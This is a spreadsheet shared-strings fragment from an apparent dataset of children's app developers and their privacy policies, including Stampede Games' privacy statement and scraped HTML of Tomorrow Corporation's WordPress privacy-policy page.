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welcome" sheetId="1" r:id="rId1"/>
  </sheets>
  <calcPr calcId="124519" fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="28730" uniqueCount="5879">
  <si>
    <t>Stampede Games</t>
  </si>
  <si>
    <t>EightyEight Games</t>
  </si>
  <si>
    <t>Tomorrow Corporation</t>
  </si>
  <si>
    <t>7th Beat Games</t>
  </si>
  <si>
    <t>RV AppStudios</t>
  </si>
  <si>
    <t>GunjanApps Studios</t>
  </si>
  <si>
    <t>Age of Learning, Inc.</t>
  </si>
  <si>
    <t>ABCya.com LLC</t>
  </si>
  <si>
    <t>Teach Your Monster</t>
  </si>
  <si>
    <t>Aha World Ltd.</t>
  </si>
  <si>
    <t>Egg Splat Studios</t>
  </si>
  <si>
    <t>Blue Zoo</t>
  </si>
  <si>
    <t>Amaziograph Ltd.</t>
  </si>
  <si>
    <t>Amazon Mobile LLC</t>
  </si>
  <si>
    <t>TutoTOONS</t>
  </si>
  <si>
    <t>Angel Studios, Inc.</t>
  </si>
  <si>
    <t>WildWorks</t>
  </si>
  <si>
    <t>Mobile Montessori ® by Rantek Inc.</t>
  </si>
  <si>
    <t>Sesame Workshop</t>
  </si>
  <si>
    <t>Ferrero Trading Lux S.A.</t>
  </si>
  <si>
    <t>Ambient Design Ltd.</t>
  </si>
  <si>
    <t>Software Studios</t>
  </si>
  <si>
    <t>Cartoon Network</t>
  </si>
  <si>
    <t>IDZ Digital Private Limited</t>
  </si>
  <si>
    <t>Pazu Games</t>
  </si>
  <si>
    <t>Avaz Inc.</t>
  </si>
  <si>
    <t>RED BUTTON LLC</t>
  </si>
  <si>
    <t>AppQuiz</t>
  </si>
  <si>
    <t>YovoGames</t>
  </si>
  <si>
    <t>BonBonGame.com</t>
  </si>
  <si>
    <t>Bebi Family: preschool learning games for kids</t>
  </si>
  <si>
    <t>BabyBus</t>
  </si>
  <si>
    <t>Minibuu</t>
  </si>
  <si>
    <t>The Pinkfong Company</t>
  </si>
  <si>
    <t>AI Factory Limited</t>
  </si>
  <si>
    <t>Budge Studios</t>
  </si>
  <si>
    <t>Beelinguapp Languages</t>
  </si>
  <si>
    <t>Hasbro Inc.</t>
  </si>
  <si>
    <t>Life.Church</t>
  </si>
  <si>
    <t>3:16 Apps</t>
  </si>
  <si>
    <t>Bini Games</t>
  </si>
  <si>
    <t>ninja kiwi</t>
  </si>
  <si>
    <t>Bob Books Publications, LLC</t>
  </si>
  <si>
    <t>Boomerang</t>
  </si>
  <si>
    <t>Renxo Europe Limited</t>
  </si>
  <si>
    <t>Amanita Design</t>
  </si>
  <si>
    <t>ClockStone STUDIO</t>
  </si>
  <si>
    <t>Brilliant.org</t>
  </si>
  <si>
    <t>Bubadu</t>
  </si>
  <si>
    <t>AI Buddy Inc.</t>
  </si>
  <si>
    <t>Sgames LLC</t>
  </si>
  <si>
    <t>GoBit Games</t>
  </si>
  <si>
    <t>Cahokia Mounds Museum Society</t>
  </si>
  <si>
    <t>Amaya Kids - learning games for 3-5 years old</t>
  </si>
  <si>
    <t>Coloring Games</t>
  </si>
  <si>
    <t>Disney</t>
  </si>
  <si>
    <t>Giant Fish</t>
  </si>
  <si>
    <t>SUBARA</t>
  </si>
  <si>
    <t>Chess.com</t>
  </si>
  <si>
    <t>Anime Dress Up Games</t>
  </si>
  <si>
    <t>Buggies Kids</t>
  </si>
  <si>
    <t>ClassDojo</t>
  </si>
  <si>
    <t>codeSpark</t>
  </si>
  <si>
    <t>Teenage Fashion Dress Up</t>
  </si>
  <si>
    <t>Orange Studios Games</t>
  </si>
  <si>
    <t>Bimi Boo Kids Learning Games for Toddlers FZ-LLC</t>
  </si>
  <si>
    <t>Dot to Dot s.r.o.</t>
  </si>
  <si>
    <t>gamesfarm</t>
  </si>
  <si>
    <t>Cosmic Kids</t>
  </si>
  <si>
    <t>Crayola LLC</t>
  </si>
  <si>
    <t>IMC Toys</t>
  </si>
  <si>
    <t>L'Escapadou</t>
  </si>
  <si>
    <t>PBS KIDS</t>
  </si>
  <si>
    <t>Dave &amp; Ava</t>
  </si>
  <si>
    <t>StoryToys</t>
  </si>
  <si>
    <t>Tapps Games</t>
  </si>
  <si>
    <t>Dr. Panda</t>
  </si>
  <si>
    <t>Hitcents</t>
  </si>
  <si>
    <t>4Axis Technologies</t>
  </si>
  <si>
    <t>Dress Up Makeover Girls Games</t>
  </si>
  <si>
    <t>TooBZ LLC</t>
  </si>
  <si>
    <t>Wow Kids</t>
  </si>
  <si>
    <t>Originator Inc.</t>
  </si>
  <si>
    <t>Steely Systems</t>
  </si>
  <si>
    <t>Epic! Creations Inc</t>
  </si>
  <si>
    <t>Pavel Zinchenko</t>
  </si>
  <si>
    <t>Bart Bonte</t>
  </si>
  <si>
    <t>GIANTS Software</t>
  </si>
  <si>
    <t>Bowen Games LLC</t>
  </si>
  <si>
    <t>Truth78</t>
  </si>
  <si>
    <t>RosiMosi</t>
  </si>
  <si>
    <t>BabyFirst</t>
  </si>
  <si>
    <t>Apps by Mr. B.</t>
  </si>
  <si>
    <t>HI10</t>
  </si>
  <si>
    <t>Classical Conversations Inc</t>
  </si>
  <si>
    <t>Humongous Entertainment</t>
  </si>
  <si>
    <t>Spin Master, Ltd.</t>
  </si>
  <si>
    <t>Baram FZE</t>
  </si>
  <si>
    <t>Afterburn</t>
  </si>
  <si>
    <t>GoNoodle</t>
  </si>
  <si>
    <t>COOL NIKS</t>
  </si>
  <si>
    <t>Oceanhouse Media, Inc.</t>
  </si>
  <si>
    <t>Feral Interactive</t>
  </si>
  <si>
    <t>Cosmicode</t>
  </si>
  <si>
    <t>Hello-Game</t>
  </si>
  <si>
    <t>Hippo Kids Games</t>
  </si>
  <si>
    <t>MythicOwl</t>
  </si>
  <si>
    <t>Language Skills Studio</t>
  </si>
  <si>
    <t>Adriaan de Jongh</t>
  </si>
  <si>
    <t>Highlights for Children, Inc.</t>
  </si>
  <si>
    <t>gamebra.in</t>
  </si>
  <si>
    <t>grapefrukt games</t>
  </si>
  <si>
    <t>Anishu, Inc.</t>
  </si>
  <si>
    <t>Homer Learning</t>
  </si>
  <si>
    <t>Hooked on Phonics</t>
  </si>
  <si>
    <t>Dekoa Apps</t>
  </si>
  <si>
    <t>Karate Goose Studio</t>
  </si>
  <si>
    <t>PlayWay SA</t>
  </si>
  <si>
    <t>So Far So Good</t>
  </si>
  <si>
    <t>WriteOn</t>
  </si>
  <si>
    <t>IntellectoKids Ltd</t>
  </si>
  <si>
    <t>Acram Digital sp z o.o.</t>
  </si>
  <si>
    <t>Chase Colburn</t>
  </si>
  <si>
    <t>JusTalk</t>
  </si>
  <si>
    <t>Kahoot!</t>
  </si>
  <si>
    <t>Benipol Limited</t>
  </si>
  <si>
    <t>Kiddopia Inc.</t>
  </si>
  <si>
    <t>Kidly - Stories for Kids</t>
  </si>
  <si>
    <t>Playables</t>
  </si>
  <si>
    <t>App Family Kids - Games for boys and girls</t>
  </si>
  <si>
    <t>Doodle Joy Studio</t>
  </si>
  <si>
    <t>Intellijoy Educational Games for Kids</t>
  </si>
  <si>
    <t>elf audio</t>
  </si>
  <si>
    <t>LeapFrog Enterprises, Inc</t>
  </si>
  <si>
    <t>Goodvyzn</t>
  </si>
  <si>
    <t>FunEasyLearn</t>
  </si>
  <si>
    <t>Duolingo</t>
  </si>
  <si>
    <t>Warner Bros. International Enterprises</t>
  </si>
  <si>
    <t>LEGO System A/S</t>
  </si>
  <si>
    <t>NimbleBit LLC</t>
  </si>
  <si>
    <t>Letterschool Enabling Learning</t>
  </si>
  <si>
    <t>Lingokids - English Learning For Kids</t>
  </si>
  <si>
    <t>Fox &amp; Sheep</t>
  </si>
  <si>
    <t>Diveo Media - Story Books for Kids</t>
  </si>
  <si>
    <t>NHA GAMES</t>
  </si>
  <si>
    <t>Egghead Games LLC</t>
  </si>
  <si>
    <t>LogicLike - Educational Games</t>
  </si>
  <si>
    <t>TEATIME</t>
  </si>
  <si>
    <t>Wolfoo LLC</t>
  </si>
  <si>
    <t>Mad Scientist</t>
  </si>
  <si>
    <t>DEVGAME KIDS games</t>
  </si>
  <si>
    <t>Crab's Games</t>
  </si>
  <si>
    <t>MentalUP - Learning Games for Kids</t>
  </si>
  <si>
    <t>Meta Platforms, Inc.</t>
  </si>
  <si>
    <t>Vectorpark</t>
  </si>
  <si>
    <t>XiHe Digital (GuangZhou) Technology Co., Ltd.</t>
  </si>
  <si>
    <t>Mindware Consulting, Inc</t>
  </si>
  <si>
    <t>Mojang</t>
  </si>
  <si>
    <t>Dinosaur Polo Club</t>
  </si>
  <si>
    <t>Minno Kids</t>
  </si>
  <si>
    <t>THUP Games</t>
  </si>
  <si>
    <t>PlayDate Digital Inc.</t>
  </si>
  <si>
    <t>Makkajai: Math Games for 1st, 2nd, 3rd, 4th grade</t>
  </si>
  <si>
    <t>EDOKI ACADEMY</t>
  </si>
  <si>
    <t>Guinea Pig Games LLC</t>
  </si>
  <si>
    <t>Mind Candy Ltd</t>
  </si>
  <si>
    <t>HitGrab Game Studio</t>
  </si>
  <si>
    <t>My Town Games Ltd</t>
  </si>
  <si>
    <t>Gameloft SE</t>
  </si>
  <si>
    <t>Shimon Young : Play Home Software</t>
  </si>
  <si>
    <t>Nickelodeon</t>
  </si>
  <si>
    <t>Thomas Grayston Software</t>
  </si>
  <si>
    <t>Novel Effect Inc.</t>
  </si>
  <si>
    <t>Oliver Mochmann</t>
  </si>
  <si>
    <t>Studio Pango - Kids Fun preschool learning games</t>
  </si>
  <si>
    <t>Libii HK Limited</t>
  </si>
  <si>
    <t>Flamebait Games</t>
  </si>
  <si>
    <t>Journey Bound Games Inc.</t>
  </si>
  <si>
    <t>Yajat Kumar</t>
  </si>
  <si>
    <t>Lazaros Dinakis</t>
  </si>
  <si>
    <t>Pepi Play</t>
  </si>
  <si>
    <t>Entertainment One</t>
  </si>
  <si>
    <t>trochoi ltd co</t>
  </si>
  <si>
    <t>University of Colorado Boulder</t>
  </si>
  <si>
    <t>Spalding Education</t>
  </si>
  <si>
    <t>Photomath, Inc.</t>
  </si>
  <si>
    <t>Pinna LLC</t>
  </si>
  <si>
    <t>Slime Games for Girls</t>
  </si>
  <si>
    <t>BetterLife Technology</t>
  </si>
  <si>
    <t>Playkids Inc</t>
  </si>
  <si>
    <t>The Pokémon Company</t>
  </si>
  <si>
    <t>Dry Cactus Limited</t>
  </si>
  <si>
    <t>KiDEO</t>
  </si>
  <si>
    <t>Prodigy Education Inc.</t>
  </si>
  <si>
    <t>Joel McDonald</t>
  </si>
  <si>
    <t>Infinity Games, Lda</t>
  </si>
  <si>
    <t>Romans I XVI Gaming</t>
  </si>
  <si>
    <t>Readability Reading Tutor</t>
  </si>
  <si>
    <t>Blake eLearning Pty Ltd</t>
  </si>
  <si>
    <t>Future Today Inc</t>
  </si>
  <si>
    <t>Sago Mini</t>
  </si>
  <si>
    <t>Kalrom Systems LTD</t>
  </si>
  <si>
    <t>SmellyMoo</t>
  </si>
  <si>
    <t>PlayMonster LLC</t>
  </si>
  <si>
    <t>Everett Kaser</t>
  </si>
  <si>
    <t>shredderchess.com</t>
  </si>
  <si>
    <t>Lowtech Studios</t>
  </si>
  <si>
    <t>Epic Story Interactive</t>
  </si>
  <si>
    <t>SEGA</t>
  </si>
  <si>
    <t>Blub Blub Inc.</t>
  </si>
  <si>
    <t>StudyPad, Inc.</t>
  </si>
  <si>
    <t>Dan Russell-Pinson</t>
  </si>
  <si>
    <t>Star Stable Entertainment AB</t>
  </si>
  <si>
    <t>Starfall Education Foundation</t>
  </si>
  <si>
    <t>Cateater</t>
  </si>
  <si>
    <t>A4tune Labs</t>
  </si>
  <si>
    <t>Studycat</t>
  </si>
  <si>
    <t>kersofts</t>
  </si>
  <si>
    <t>Skyship Entertainment Company</t>
  </si>
  <si>
    <t>The Christian Broadcasting Network (CBN)</t>
  </si>
  <si>
    <t>Candy Rufus Games</t>
  </si>
  <si>
    <t>Synthesia LLC</t>
  </si>
  <si>
    <t>Hey Clay</t>
  </si>
  <si>
    <t>Viva Games Studios</t>
  </si>
  <si>
    <t>Soundbrenner</t>
  </si>
  <si>
    <t>Avokiddo</t>
  </si>
  <si>
    <t>TinyTap</t>
  </si>
  <si>
    <t>Tizi Town Games</t>
  </si>
  <si>
    <t>Toca Boca</t>
  </si>
  <si>
    <t>Torah Treasure</t>
  </si>
  <si>
    <t>Raw Fury</t>
  </si>
  <si>
    <t>The Voxel Agents</t>
  </si>
  <si>
    <t>True Axis</t>
  </si>
  <si>
    <t>Linda Schnetzinger</t>
  </si>
  <si>
    <t>Homesoft, LLC</t>
  </si>
  <si>
    <t>EuroTalk Ltd</t>
  </si>
  <si>
    <t>RUD Present</t>
  </si>
  <si>
    <t>Mobinautica</t>
  </si>
  <si>
    <t>Videolabs</t>
  </si>
  <si>
    <t>Vooks Inc</t>
  </si>
  <si>
    <t>Stone Golem Studios</t>
  </si>
  <si>
    <t>Ganz TM</t>
  </si>
  <si>
    <t>Nival International</t>
  </si>
  <si>
    <t>Turbo Rocket Games</t>
  </si>
  <si>
    <t>77SPARX Studio, Inc.</t>
  </si>
  <si>
    <t>Mrs. Wordsmith</t>
  </si>
  <si>
    <t>XtraMath</t>
  </si>
  <si>
    <t>Yasa Ltd</t>
  </si>
  <si>
    <t>Google LLC</t>
  </si>
  <si>
    <t>YoYa World</t>
  </si>
  <si>
    <t>Zigazoo</t>
  </si>
  <si>
    <t>TERC</t>
  </si>
  <si>
    <t xml:space="preserve">Our games don't collect any personal information and doesn't share it with third parties. Hence they are COPPA-compliant.
 Our games don't require any extra permissions so we can't collect any personal data and don't want to.
</t>
  </si>
  <si>
    <t>Our games contains no in-app purchases and no advertisements.
 Our games use 3rd party GameAnalytics plug in. We use it to collect anonymous data about player's behavior (like how much time particular level takes to complete or average session length).</t>
  </si>
  <si>
    <t>You can find more information here: http://www.gameanalytics.com/privacy.
 When you use our website (http://stampedegames.net), the following cookies can be stored at your computer: Google Analytics and YouTube cookies. We use them to analyze the use of this website.</t>
  </si>
  <si>
    <t xml:space="preserve">Cookies don't contain any personal information. You can get more information here: http://www.google.com/privacypolicy.html.
 Our games contains following web links: to our website; to game's page in app store; to game's Twitter page, Facebook group and YouTube channel.
</t>
  </si>
  <si>
    <t xml:space="preserve">Our games are fully functional offline. When Internet connection is available the game will download the latest localization file from our server and send anonymous usage analytics to GameAnalytics service.
 If you have any questions about your privacy feel free to contact us at privacy@stampedegames.net
</t>
  </si>
  <si>
    <t>Couldn't decode</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;_x005F_x000D_
&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"&gt;_x005F_x000D_
_x005F_x000D_
&lt;head profile="http://gmpg.org/xfn/11"&gt;_x005F_x000D_
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;_x005F_x000D_
_x005F_x000D_
&lt;meta name="description" content="Tomorrow Corporation is an independent game developer behind indie games Little Inferno and Human Resource Machine" /&gt;_x005F_x000D_
_x005F_x000D_
&lt;title&gt;Tomorrow Corporation  :   Important Privacy Policy&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
&lt;link rel="shortcut icon" href="https://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/favicon.ico" /&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="https://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/style.css" type="text/css" media="screen" /&gt;_x005F_x000D_
&lt;link rel="pingback" href="https://tomorrowcorporation.com/blog/xmlrpc.php"</t>
  </si>
  <si>
    <t>/&gt;_x005F_x000D_
&lt;link rel="alternate" type="application/rss+xml" title="Tomorrow Corporation RSS Feed" href="https://tomorrowcorporation.com/feed" /&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- begin wp_head() --&gt;_x005F_x000D_
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;script type="text/javascript"&gt;
 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/tomorrowcorporation.com\/blog\/wp-includes\/js\/wp-emoji-release.min.js?ver=b1eb42474d09240aa08579e0bb84f505"}};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</si>
  <si>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id='wp-block-library-css' href='https://tomorrowcorporation.com/blog/wp-includes/css/dist/block-library/style.min.css?ver=b1eb42474d09240aa08579e0bb84f505' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://tomorrowcorporation.com/blog/wp-includes/css/classic-themes.min.css?ver=b1eb42474d09240aa08579e0bb84f505'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t>
  </si>
  <si>
    <t>6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px</t>
  </si>
  <si>
    <t>0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end:</t>
  </si>
  <si>
    <t>2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained &gt; .aligncenter{margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}body .is-layout-constrained &gt; .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex &gt; *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-white-color{color: var(--wp--preset--color--white) ! important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) ! important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) ! important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) ! important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) ! important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) ! important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) ! important;}.has-black-background-color{background-color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-white-background-color{background-color: var(--wp--preset--color--white) ! important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) ! important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) ! important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) ! important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) ! important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) ! important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) ! important;}.has-black-border-color{border-color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-white-border-color{border-color: var(--wp--preset--color--white) ! important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) ! important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) ! important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) ! important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) ! important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) ! important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) ! important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) ! important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) ! important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) ! important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) ! important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) ! important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) ! important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) ! important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !</t>
  </si>
  <si>
    <t>important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) ! important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) ! important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !</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</si>
  <si>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rel="https://api.w.org/" href="https://tomorrowcorporation.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://tomorrowcorporation.com/wp-json/wp/v2/pages/2213" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="EditURI" type="application/rsd+xml" title="RSD" href="https://tomorrowcorporation.com/blog/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://tomorrowcorporation.com/blog/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel="canonical" href="https://tomorrowcorporation.com/important-privacy-policy" /&gt;
&lt;link rel='shortlink' href='https://tomorrowcorporation.com/?p=2213' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://tomorrowcorporation.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftomorrowcorporation.com%2Fimportant-privacy-policy" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://tomorrowcorporation.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftomorrowcorporation.com%2Fimportant-privacy-policy&amp;#038;format=xml" /&gt;
&lt;!-- end wp_head() --&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;body class="privacy-policy page-template-default page page-id-2213"&gt;_x005F_x000D_
_x005F_x000D_
&lt;div id="page"&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- tomorrow corporation!!!! and menu stuff --&gt;_x005F_x000D_
&lt;div id="head"&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!-- top image --&gt;_x005F_x000D_
	&lt;div style="margin:0px;	padding:0px; border:0px;"&gt;&lt;a href="/" &gt;&lt;img width="1000" height="268" src="https://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_head.jpg" alt="Tomorrow Corporation: Indie Game Developer, Kyle Gabler, Kyle Gray, Allan Blomquist, Little Inferno, Human Resource Machine"&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!-- nav menu --&gt;_x005F_x000D_
	&lt;div id="navmenu"&gt;_x005F_x000D_
		&lt;img width="379" height="81" src="https://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_navmenu_left.jpg" &gt;_x005F_x000D_
		&lt;a id="navmenu_RSS" href="/feed" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;a id="navmenu_BLOG" href="/" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;a id="navmenu_GAMES" href="/games" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;a id="navmenu_ABOUT" href="/about" &gt;&lt;/a&gt;_x005F_x000D_
		&lt;img width="205" height="81" src="https://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_navmenu_right.jpg" &gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
	&lt;!--</t>
  </si>
  <si>
    <t>the little strip below the menu --&gt;_x005F_x000D_
	&lt;div style="margin:0px;	padding:0px; border: 0px;"&gt;_x005F_x000D_
		&lt;img src="https://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_contenthead.jpg" &gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
&lt;div id="torso"&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- begin main page --&gt;_x005F_x000D_
&lt;div id="content" class="contentcolumn" role="main"&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- our games nav --&gt;_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
		_x005F_x000D_
		&lt;div class="entryBegin"&gt;&lt;/div&gt;_x005F_x000D_
		&lt;div class="entryMain" id="post-2213"&gt;_x005F_x000D_
_x005F_x000D_
		_x005F_x000D_
			&lt;div class="entry"&gt;_x005F_x000D_
			_x005F_x000D_
									&lt;h2&gt; Who we are&lt;/h2&gt;
&lt;p&gt;Our website is: https://tomorrowcorporation.com and we make games!&lt;/p&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>What personal data we collect and why we collect it&lt;/h2&gt;
&lt;h2&gt;Comments&lt;/h2&gt;
&lt;p&gt;When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor’s IP address and browser user agent string to help spam detection.&lt;/p&gt;
&lt;p&gt; An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.&lt;/p&gt;
&lt;h2&gt;Cookies&lt;/h2&gt;
&lt;p&gt;If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies.</t>
  </si>
  <si>
    <t>These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.&lt;/p&gt;
&lt;p&gt;If you have an account and you log in to this site, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.&lt;/p&gt;
&lt;p&gt;When you log in, we will also set up several cookies to save your login information and your screen display choices.</t>
  </si>
  <si>
    <t>Login cookies last for two days, and screen options cookies last for a year. If you select &amp;#8220;Remember Me&amp;#8221;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.&lt;/p&gt;
&lt;p&gt;If you edit or publish an article, an additional cookie will be saved in your browser.</t>
  </si>
  <si>
    <t xml:space="preserve">This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.&lt;/p&gt;
&lt;h2&gt;Embedded content from other websites&lt;/h2&gt;
&lt;p&gt;Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites (e.g. youtube) behaves in the exact same way as if the visitor has visited the other website.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracing your interaction with the embedded content if you have an account and are logged in to that website.&lt;/p&gt;
&lt;h2&gt;Analytics&lt;/h2&gt;
